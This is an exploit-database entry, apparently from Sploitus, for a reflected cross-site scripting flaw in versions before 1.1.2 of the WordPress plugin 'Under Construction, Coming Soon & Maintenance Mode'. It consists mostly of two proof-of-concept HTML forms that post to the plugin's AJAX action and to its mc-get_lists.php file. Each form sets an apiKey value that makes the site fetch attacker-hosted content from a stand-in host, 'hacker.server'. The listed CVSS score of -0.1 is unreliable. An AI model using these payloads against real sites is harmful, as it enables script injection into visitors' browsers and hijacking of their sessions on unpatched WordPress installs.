Exploit for Under Construction, Coming Soon & Maintenance Mode < 1.1.2 - Reflected Cross-Site Scripting (XSS)

Name: Exploit for Under Construction, Coming Soon & Maintenance Mode < 1.1.2 - Reflected Cross-Site Scripting (XSS)
Rating: 5 (76 reviews)

2021-02-27 | CVSS -0.1

## https://sploitus.com/exploit?id=WPEX-ID:2FF65F3D-FD15-4C96-82AA-97757D2F35FC
Via the ucmm_mc_api AJAX action, accessible to both authenticated and unauthenticated users:

<form method="post" action="https://example.com/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="ucmm_mc_api" />
<input type="text" name="apiKey" value="-hacker.server/test.json?dummy=" />
<input type="submit" value="Submit!" />
</form>


Via direct access:

<form method="post" action="https://example.com/wp-content/plugins/under-construction-maintenance-mode/includes/mc-get_lists.php">
<input type="text" name="apiKey" value="-hacker.server/test.json?dummy=" />
<input type="submit" value="Submit!" />
</form>